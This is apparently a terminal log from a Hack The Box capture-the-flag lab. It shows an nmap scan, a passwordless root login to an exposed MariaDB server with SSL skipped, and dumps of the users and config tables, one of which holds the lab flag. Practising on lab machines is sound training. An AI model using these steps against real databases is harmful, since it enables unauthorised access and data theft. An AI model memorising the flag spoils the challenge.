Ip:10.129.32.93
┌──(shadowadmin㉿ZL2130)-[~/Documents/HackTheBox/MuyFacil/Continuacion]
└─$ ping 10.129.32.93 
	PING 10.129.32.93 (10.129.32.93) 56(84) bytes of data.
	64 bytes from 10.129.32.93: icmp_seq=1 ttl=63 time=96.3 ms
	64 bytes from 10.129.32.93: icmp_seq=2 ttl=63 time=95.3 ms
	64 bytes from 10.129.32.93: icmp_seq=3 ttl=63 time=95.2 ms
	64 bytes from 10.129.32.93: icmp_seq=4 ttl=63 time=94.9 ms
	^C
	--- 10.129.32.93 ping statistics ---
	4 packets transmitted, 4 received, 0% packet loss, time 3003ms
	rtt min/avg/max/mdev = 94.891/95.429/96.287/0.519 ms
┌──(shadowadmin㉿ZL2130)-[~/Documents/HackTheBox/MuyFacil/Continuacion]
└─$ sudo nmap -sV 10.129.32.93                             
	Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-24 14:57 -05
	Nmap scan report for 10.129.32.93
	Host is up (0.27s latency).
	Not shown: 999 closed tcp ports (reset)
	PORT     STATE SERVICE VERSION
	3306/tcp open  mysql?

	Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
	Nmap done: 1 IP address (1 host up) scanned in 163.62 seconds
	
┌──(shadowadmin㉿ZL2130)-[~/Documents/HackTheBox/MuyFacil/Continuacion]
└─$ mysql -h 10.129.32.93 -u root             
	ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
                                                                             
┌──(shadowadmin㉿ZL2130)-[~/Documents/HackTheBox/MuyFacil/Continuacion]
└─$ mysql -h 10.129.32.93 -u root --ssl-mode=DISABLED

	mysql: unknown variable 'ssl-mode=DISABLED'
                                                                             
┌──(shadowadmin㉿ZL2130)-[~/Documents/HackTheBox/MuyFacil/Continuacion]
└─$ mysql -h 10.129.32.93 -u root --ssl-mode=DISABLED

	mysql: unknown variable 'ssl-mode=DISABLED'
                                                                             
┌──(shadowadmin㉿ZL2130)-[~/Documents/HackTheBox/MuyFacil/Continuacion]
└─$ mysql -h 10.129.32.93 -u root --skip-ssl

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 195
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> SHOW Databases;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.271 sec)

MariaDB [(none)]> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [htb]> SHOW Tables;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.669 sec)

MariaDB [htb]> SELECT * FROM users;
+----+----------+------------------+
| id | username | email            |
+----+----------+------------------+
|  1 | admin    | admin@sequel.htb |
|  2 | lara     | lara@sequel.htb  |
|  3 | sam      | sam@sequel.htb   |
|  4 | mary     | mary@sequel.htb  |
+----+----------+------------------+
4 rows in set (0.097 sec)

MariaDB [htb]> SELECT * FROM config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.229 sec)

MariaDB [htb]> 

